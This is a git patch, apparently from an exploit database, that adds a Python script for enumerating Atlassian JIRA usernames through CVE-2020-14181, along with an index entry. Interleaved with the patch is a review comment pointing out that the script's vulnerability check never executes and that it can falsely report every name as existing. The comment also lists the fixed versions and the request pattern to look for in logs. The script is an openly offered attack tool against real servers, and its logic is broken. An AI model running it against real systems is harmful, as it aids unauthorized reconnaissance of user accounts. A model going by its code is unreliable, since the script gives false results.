From 128b9cd18525c89fa804f4f6119d59a46ec16420 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 11 Mar 2021 05:02:04 +0000
Subject: [PATCH] DB: 2021-03-11 1 changes to exploits/shellcodes Atlassian JIRA 8.11.1 - User Enumeration
---
 exploits/multiple/webapps/49633.py | 45 ++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 46 insertions(+)
 create mode 100755 exploits/multiple/webapps/49633.py
diff --git a/exploits/multiple/webapps/49633.py b/exploits/multiple/webapps/49633.py
new file mode 100755
index 000000000..200d1019d
--- /dev/null
+++ b/exploits/multiple/webapps/49633.py
@@ -0,0 +1,45 @@
+# Title: Atlassian JIRA 8.11.1 - User Enumeration
+# Author: Dolev Farhi
+# Vulnerable versions: version < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+# CVE: CVE-2020-14181
+# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.
+
+import sys
+import os
+import requests
+
+def help():
+ print('python3 script.py ')
+ print('e.g. python3 script.py https://jiratarget.com usernames.txt')
+ sys.exit()
+
+if len(sys.argv) < 3:
+ help()
+
+server = sys.argv[1]
+usernames = sys.argv[2]
+
+random_user = '0x00001'
+
+try:
+ os.path.exists(usernames)
+except:
+ print(usernames, 'file does not exist.')
+ sys.exit(1)
+
+def test_vulnerable():
+ resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+ if 'User does not exist: {}'.format(random_user) in resp.text:
+ return True
+ return False
+
+if test_vulnerable is False:
+ print('server is not vulnerable.')
+ sys.exit(1)
+
+f = open(usernames, 'r').read()
+
+for username in f.splitlines():
+ resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+ if 'User does not exist' not in resp.text:
+ print('EXISTS', username)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c273983f..9eee078a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
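Review bot: The pre-flight check in the new 49633.py never runs: `if test_vulnerable is False:` compares the function object itself to False, and inside `test_vulnerable()` the request is built from `username`, which is not assigned until the later `for` loop, rather than from `random_user`. As a result the script proceeds against any server, and on an instance that does not return the 'User does not exist' text (presumably a patched or login-gated one) every name in the list would be printed as EXISTS, which makes it unreliable for confirming that your own instance is fixed. The check should read `if not test_vulnerable():` with the probe formatted from `random_user`. The `try: os.path.exists(usernames)` guard is also dead code, since `os.path.exists` returns a bool instead of raising; `if not os.path.isfile(usernames):` would do what the message says. For defenders, the fixed versions named in the file header (7.13.16, 8.5.7, 8.12.0) are the remediation, and unauthenticated requests to `/secure/ViewUserHover.jspa` are the thing to look for in access logs.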
@@ -43819,3 +43819,4 @@ id,file,description,date,author,type,platform,port
 49625,exploits/php/webapps/49625.py,"Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-08,"Christian Vierschilling",webapps,php,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
+49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,